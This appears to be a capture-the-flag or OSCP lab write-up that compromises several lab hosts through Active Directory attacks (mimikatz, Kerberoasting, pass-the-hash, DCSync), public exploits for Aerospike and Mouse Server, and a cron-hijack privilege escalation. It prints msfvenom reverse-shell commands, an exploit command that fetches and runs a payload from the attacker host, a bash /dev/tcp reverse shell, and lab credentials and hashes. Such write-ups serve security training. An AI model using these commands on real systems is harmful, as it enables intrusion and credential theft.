Skip to content

OSCP A

Network

Given:

  • 192.168.188.141 MS01 (Windows)
  • 192.168.188.143 Aero
  • 192.168.188.144 Crystal
  • 192.168.188.145 Hermes

Found:

  • 10.10.148.140 DC01
  • 10.10.148.142 MS02

Creds

eric.wallows:EricLikesRunning800 (given creds for 192.168.155.141)
web_svc:Diamond1 (Kerberoasted user)

other users:
tom.admin
sql_svc

Network Enumeration

192.168.188.141 / MS01

Enumeration

Testing the user, we know that the domain is oscp.exam and the machine is MS01.

Initial Access

We can access the machine via SSH.

ssh eric.wallows@192.168.201.141

Let's start enumerating permissions, subnets, and users.

We have an interface on 10.10.161.141 and SeImpersonatePrivilege. We also have all domain users. Let's create a users.txt file.

We transfer adPEAS and winPEAS to the target.

Import the adPEAS module and execute it.

Found the DC on 10.10.161.140.

We found tom_admin, who can DCSync to the domain, and two Kerberoastable users: sql_svc and web_svc.

Privilege Escalation

The user has SeImpersonatePrivilege, so we'll perform a PrintSpoofer attack. Transfer the exploit and execute it.

Post Exploitation

Transfer mimikatz.exe to the machine and execute it as administrator.

sekurlsa::logonpasswords

celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd
mary.williams:9a3121977ee93af56ebd0ef4f527a35e

We can use hashcat to try cracking some passwords.

No results. Let's try another route: Kerberoasting.

Transfer chisel.exe to the target and create a SOCKS tunnel.

Now perform a Kerberoasting attack with proxychains pointing to the DC.

Using hashcat, we cracked the password:

web_svc:Diamond1

Now perform a ping sweep to find x.x.x.41 and x.x.x.42.

10.10.148.142 / MS02

Enumeration

Initial Access

Using Celia Almeda's credentials, we log in via WinRM, passing the hash.

In C:\, we find windows.old, so we take SAM and SYSTEM, download them with evil-winrm, and then use secretsdump locally.

Pass-the-hash (PTH) to DC01.

10.10.148.140 / DC01

Initial Access

Using the hash found on 142, we use evil-winrm.

Privilege Escalation

tom_admin can DCSync the DC, so:

Post Exploitation

Using the hash:

192.168.188.143 / AERO

Enumeration

The web server on port 80 is the default Apache2 page with nothing more.
The one at 81 is the default Nginx Fedora page.

The machine is called Aero, so I searched for Aero and port 3000 and found Aerospike, which is a NoSQL database.
The script in searchsploit is broken, so I searched for the vulnerability online and found https://github.com/b4ny4n/CVE-2020-13151.

Initial Access

The correct script is the one at https://www.exploit-db.com/exploits/49067 with the Lua script in the GitHub repo. We have to change the version in the script before executing it.

Once changed, start a listener on port 80 and an HTTP server on port 443 serving a reverse shell.

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.229 LPORT=80 -f elf -o reverse

python cve2020-13151.py --ahost 192.168.155.143 --cmd 'wget http://192.168.45.229:443/reverse -O /tmp/reverse && chmod +x /tmp/reverse && /tmp/reverse &'

Get the proof in Aero's home directory.

Privilege Escalation

Checking the SUID programs, we find screen-4.5.0.

But I couldn't get it to work, so I transferred and launched pspy and found a file being executed periodically.

/usr/bin/asinfo. I replaced the content with bash -i >& /dev/tcp/192.168.45.229/443 0>&1, started a listener, and waited.

echo 'bash -i >& /dev/tcp/192.168.45.229/443 0>&1' > /usr/bin/asinfo

Post Exploitation

192.168.188.144 / CRYSTAL

Enumeration

Using Nikto, we find a .git folder.

Initial Access

With git-dumper, we can retrieve all files.

We got the project.

In the configuration:

If we examine the logs, we can retrieve this database version from the past:

So dean@challenge.pwk:BreakingBad92.

Another update gives us another user:

stuart@challenge:BreakingBad92.

Testing the FTP service, we retrieve the local flag.

Using the same user with SSH:

Privilege Escalation

We see in /opt/backups that there is a backup of the web. Transfer it to the attack host, use zip2john, and with hashcat, we retrieve the password: codeblue.

We then extract the zip with 7z x and find in the config file:

Database credentials, but there is no database running.

So we try to pivot to Chloe with the secret, and:

Post Exploitation

Chloe is admin, so pivot to root, and we retrieve the flag.

192.168.188.145 / HERMES

Enumeration

The web page has nothing, but we can enumerate a user, Samuel Haynes, who could be s.haynes or samuel.haynes.

Scanning UDP, we find port 161.

Using snmpwalk, first we retrieve the users, then running apps.

Initial Access

We see Mouse Server 1.7.8.5, so:

We create an msfvenom reverse shell, a Python server to serve it, and an nc listener on port 80.

python 50972.py 192.168.188.145 192.168.45.229:443 reverse.exe

Privilege Escalation

Get local flag

Transfer winPEAS, and:

RDP to the machine:

xfreerdp3 /u:zachary /p:'Th3R@tC@tch3r' /v:192.168.188.145

The proof is on the admin's desktop.